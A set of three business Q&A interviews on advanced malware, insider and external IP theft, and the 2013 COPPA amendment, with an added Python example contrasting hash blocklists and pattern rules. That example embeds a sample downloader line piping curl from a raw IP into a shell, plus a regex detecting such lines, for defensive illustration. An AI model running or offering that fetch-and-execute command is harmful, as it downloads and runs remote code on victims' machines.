Fighting Advanced Malware

A Q&A with Ramon Peypoch of McAfee, Inc.
One of the most insidious enemies of data security is advanced malware. But what are these advanced persistent threats, and how can companies protect themselves from them? I asked Ramon Peypoch, VP of Web Protection at McAfee, to share his expertise.

Can you please define ‘advanced malware’ and describe the harm it can bring to an organization?
There’s a confluence of different situations that can fall under the term advanced malware, but basically these are stealth attacks that tend to get past existing security solutions. The threats might come from state-sponsored entities such as the Chinese or Russian governments trying to penetrate United States government networks or steal IP from commercial enterprises. What we know is that advanced malware is responsible for a great deal of loss in terms of IP and financial assets. In terms of the actual techniques involved, advanced malware typically combines sophisticated hacking, social engineering and spear phishing that allow an intruder to go undetected in your network for a long period of time. One example might be something that looks like an email from a friend telling you to click on a link to view vacation photos—you click on the link and nothing seems to happen but important code is downloaded to the machine that would “wake up” the next time you enter in PII. The bottom line is that these are very real threats being perpetrated by very sophisticated people. This is not some 13-year-old antisocial kid trying to make a name for himself.

How common is this threat for organizations?
Research shows us that the true cost of cyber crime is staggering—multiple billions of dollars of losses on an annual basis. If you are a business with any type of sensitive financial information or intellectual property, you are a target. And unfortunately hackers don’t just go after the largest organizations. They actually get the most bang for their buck with small and medium enterprises, because these are often more susceptible than the big guys.

How does advanced malware get past an organization’s defenses? Are organizations failing to implement controls that could stop it?
Basically, advanced malware can defeat signature-based defenses—the conventional security solutions that most people are using today. These are great at stopping already-identified threats but they won’t catch anything new. Since traditional solutions are not effective, the gap is widening, allowing the threats to grow exponentially.

What can a company do to mitigate this exposure proactively?
The easy answer from my perspective is to look into McAfee’s solutions. We are taking a different approach to solving this problem. We use the traditional signature-based solution and complement it with a specific advanced malware solution that uses cloud-based lookups and analysis including a hash of malware sent to different parts of the McAfee protection network. Once it’s identified, it’s stopped right there at all the endpoints and we can do a lookup to make sure nothing has been compromised—if it has, we initiate a remediation process. Unlike a lot of our competitors’ solutions, it’s not just a malware sandbox, it’s actually multiple products working to combat the problem in an integrated way.
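To make the distinction in the two answers above concrete, here is an added example (not McAfee’s code, and not part of the original interview). It shows why an exact-hash lookup of the kind the answer describes catches a sample that has already been identified but misses a variant that differs by a single byte, and why a rule written against the sample’s behaviour still catches both. The “known malware” sample, the hash blocklist and the fetch-and-execute pattern rule are all constructed here for illustration and do not come from any real product or feed.

```python
"""Added example: exact-hash signature lookup versus a content-pattern rule.

Everything below is constructed for illustration: the sample, the blocklist
and the pattern rule are assumptions, not data from any vendor feed.
"""
import hashlib
import re

# Constructed "known malware" sample: a fake downloader script whose only
# meaningful content is a sleep stub and a hard-coded fetch-and-execute line.
KNOWN_SAMPLE = (
    b"#!/bin/sh\n"
    b"sleep 3600\n"
    b"curl -s http://203.0.113.10/stage2.sh | sh\n"
)


def sha256(data: bytes) -> str:
    """Hex SHA-256 of a file's bytes: the key a reputation lookup would use."""
    return hashlib.sha256(data).hexdigest()


# The hash blocklist models the cloud lookup described in the answer: a set
# of digests of files that have already been identified somewhere.
HASH_BLOCKLIST = {sha256(KNOWN_SAMPLE)}

# A content-pattern rule (in the spirit of a YARA rule, written here as a
# regular expression) describing the behaviour rather than the exact bytes:
# a curl/wget fetch from a raw IP address piped straight into a shell.
PIPE_TO_SHELL = re.compile(
    rb"(curl|wget)[^\n|]*https?://\d{1,3}(\.\d{1,3}){3}[^\n|]*\|\s*(ba)?sh"
)


def hash_lookup(sample: bytes, blocklist=HASH_BLOCKLIST) -> bool:
    """Signature-style check: True only if this exact file was seen before."""
    return sha256(sample) in blocklist


def pattern_check(sample: bytes) -> bool:
    """Behavioural check: True if the fetch-and-execute pattern is present."""
    return PIPE_TO_SHELL.search(sample) is not None


def make_variant(sample: bytes) -> bytes:
    """Simulate what an attacker does between campaigns: change one byte
    (the sleep interval) so the file's hash no longer matches the blocklist."""
    return sample.replace(b"sleep 3600", b"sleep 3601", 1)


def classify(sample: bytes) -> dict:
    """Return both verdicts so the gap between them is visible."""
    return {"hash_match": hash_lookup(sample), "pattern_match": pattern_check(sample)}


if __name__ == "__main__":
    for name, sample in (("known", KNOWN_SAMPLE), ("variant", make_variant(KNOWN_SAMPLE))):
        print(name, sha256(sample)[:16], classify(sample))
```

Running the block shows the known sample matched by both checks and the one-byte variant matched only by the pattern rule, which is the gap the interview describes: a hash or signature lookup is only as good as the set of samples that have already been seen.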

In summary…
Ramon underscores the problem that many of our clients are seeing and combating on a daily basis. The bad guys are very smart and often one step ahead of both human and electronic security measures, giving them unauthorized access to information-based assets. Even clients with sophisticated IT operations and large security budgets can fall victim simply because there are so many variables and third-party dependencies to control. (A few examples include a large server farm with an uninventoried system missing a patch, mishaps with vendors, or staff who get duped.) Organizations need to keep this in mind when selecting solutions for combating malware.

Protecting Intellectual Property from Internal and External Theft

A Q&A with Tim Ryan of Kroll
The second in our ongoing series on IP theft, this Q&A with Tim Ryan of Kroll explores the current situation companies are facing vis-à-vis data security and intellectual property, and what they can do to better arm against growing threats. A former FBI supervisor for the largest cyber squad in the United States, Ryan is currently the head of Kroll’s cyber practice, which handles incident response, breach investigations and risk assessment.

Can you explain the current situation of international IP theft in corporate America? What do companies need to know? Are there any misconceptions or myths that need to be addressed?
The problems we see fall into one of two main buckets. Companies are getting hacked externally by competitors looking for anything from product designs to marketing information or other data. The other threat is from insiders, contractors or employees who move on and take key data such as proprietary algorithms with them. Adding to the complexity of the situation is the fact that a lot of knowledge workers are foreign nationals residing here strictly for employment purposes so all of the legal constraints against taking data—non-compete and nondisclosure agreements—may not apply to them. As we move toward a knowledge-based economy, this poses a real problem. The biggest myth out there is that this is an IT issue—the thief downloaded the information from an IT system so that’s the department that will handle it. Sometimes vendors play into that myth by offering data loss prevention hardware or software with the promise that it will keep theft from happening but we all know that’s just not true. The truth is that for both external and internal threats you need a comprehensive team approach.

Why is this happening? Why now?
This is just a measure of how our economy has changed. We are constantly looking for efficiency through technology and we seamlessly share data across broad geographic areas in the blink of an eye. Those same systems, if not properly controlled, can allow access to that sensitive data. I also think it has something to do with the transient nature of our workplace. We no longer work at a single organization for twenty years. It’s often employees that are further down the food chain that are taking the info from job to job. People in the government know this practice is illegal but in the private sector it can be more amorphous as to what data is proprietary. Often we will get a call from a company when they realize that they unwittingly have another company’s data.

How might a company go about protecting their IP data and systems?
You need to have an integrated team that can deal with a threat. From an external point of view, it’s about IT architecture, governance, response training and risk assessment. Sometimes companies won’t do anything about external hacking because the problem doesn’t escalate from the lower level employees to the C-suite level. We find that there might be a conflict of interest, because IT employees feel it’s their job to prevent leaks so when something happens they don’t want to ring alarm bells. But that’s where a small problem can become a big one.

When you’re talking about internal issues, you need a team with IT, legal, human resources and the chief security officer. Too often companies are surprised to find out that an employee is doing something wrong, so it starts in the very beginning, with hiring practices, vetting every individual with a background check. However, when someone is from a foreign country it can be difficult to access criminal records, so you look at the timeline, you look at their skills, you look at everything very closely. And once they are hired, you limit their access to data. In the FBI employees are re-vetted every five years, and it should be the same for corporations. There also needs to be accountability. We recently investigated a case where an individual started with relatively minor infractions and then progressively got worse. The company documented what was happening but never did anything about it and by the time he was fired he had done something really egregious.

There’s a bigger trend, especially in large defense corporations, to bring in in-house data security, but if you go to medical facilities, financial trading firms and companies in the R&D space, they sometimes haven’t gone far enough and that’s when they get hit. Any organization should think about security solutions, whether it’s hiring someone internally or buying an off-the-shelf product, because the threat is out there and it’s real.

In summary…
Mr. Ryan mentioned the importance of IP in this new knowledge-based economy, making security paramount for companies whose data is their lifeblood. The recent study by Mandiant, available in the eRisk Hub, underscores the reality of this problem impacting corporate America every day. Many businesses still don’t have an inventory of their IP that needs protection. Having this in place is crucial for strategically protecting these assets. One possibility companies should consider, for example, is whether every system that houses IP needs to be connected to the public internet.

Understanding COPPA and its Risk Ramifications

A Q&A with James Prendergast and Chris DiIenno of Nelson Levine De Luca and Hamilton
First put into effect in 2000, the Children’s Online Privacy Protection Act (COPPA) was designed to protect the PII of children under age 13 online. In July 2013, the regulation was revised to address more recent ways that children use the internet—namely, through social networking, apps and mobile devices. To better grasp the new amendment’s implications for businesses that collect the PII of children online, I talked to Jim Prendergast and Chris DiIenno, partners in the Privacy and Data Security Group at Nelson Levine De Luca and Hamilton, LLC.

Can you give us a summary of the COPPA amendment that went into effect July 1, 2013?
The main highlights are the following:

  1. The regulation requires parental notification and consent for any entity collecting children’s PII.
  2. Personal information has now been much more expansively defined under COPPA so that collecting some forms of data that were routinely collected in the past without parental consent would now be in clear violation of the regulation. This includes geographic location information, photographs, video, audio, user names and persistent identifiers.
  3. Third party vendors providing plug-ins and ad networks are now expressly required to obtain parental consent and notification.

What are the cyber liability risk ramifications for any company that collects, stores and shares PII from children?
The risks include fines and injunctions from the FTC and class action lawsuits if the data is not collected carefully and properly. This new legislation targets app makers and website operators who have consciously directed their marketing to a younger audience. The FTC is looking for violations. If they catch violators, expect a substantial fine and bad publicity. I would also say that the third party plug-in providers, which were left out of the first law through a loophole, and have routinely been collecting information, might be the most threatened by this regulation. The worst-case scenario would be an app designer that either hasn’t paid attention to the amendment or has chosen to ignore it and has collected PII from kids for a long time.

What are the penalties?
Any entity that violates the new COPPA statute is subject to the full wrath of the FTC. The FTC can put violators out of business—either by substantial fines (up to $16,000 per violation) or by ruining their business reputation. When you’re looking at the fine amounts, consider that a company could be collecting information from 1,000 children and might have multiple violations per child. The FTC, or the states, can also take you to court for an injunction to prohibit you from doing business.

Are you predicting class action lawsuits?
Yes. Class action lawyers have awaited these modifications with glee. I believe judges would be more inclined to find an identifiable class (which they generally haven’t been for cyber suits) because in this case they are protecting children. And while plaintiffs’ lawyers have had difficulty defining damages in some privacy cases, here, the FTC has done that for them and articulated the $16,000 per violation figure.

What can a company do to mitigate their exposure?

  1. Know the rules.
  2. Get parental consent. If you have any doubt at all that your website is directed at children, go to the COPPA website and figure it out.
  3. Post your privacy policy prominently online.
  4. If you have any change in your data collection at any point you must go out and tell mom and dad that you need their consent again—it’s not good enough to send a notice and then start collecting information.

Another consideration is that companies should try to understand what data they are collecting and how they are using it. They might find that they are collecting and storing data that they once had the intent to use or sell but no longer serves any purpose for them. If you don’t need to collect it, don’t.

Any other thoughts?
Because these regulations are new and directed at children it would definitely help app makers and related vendors to have a privacy liability policy that specifically addresses these issues.

In summary…
COPPA raises the stakes for transparency in a company’s privacy practices when data pertaining to children is involved. For children-directed app makers and others subject to the rule, staying in compliance may mean clearing hurdles such as sending a direct notice (by email or mail) to the parent and obtaining verifiable parental consent. Some consent methods may seem laborious for both the company and parents (for example, requiring parents to call, send a fax, mail a signed form, use a credit card, or email a digitally signed form), but there is no way around the regulation. So the big question is: are website operators and app owners ready to put these practices in place today? Readiness certainly requires a serious investment, but not tackling these issues could invite FTC or State AG enforcement actions and plaintiffs’ lawsuits, which no company can afford.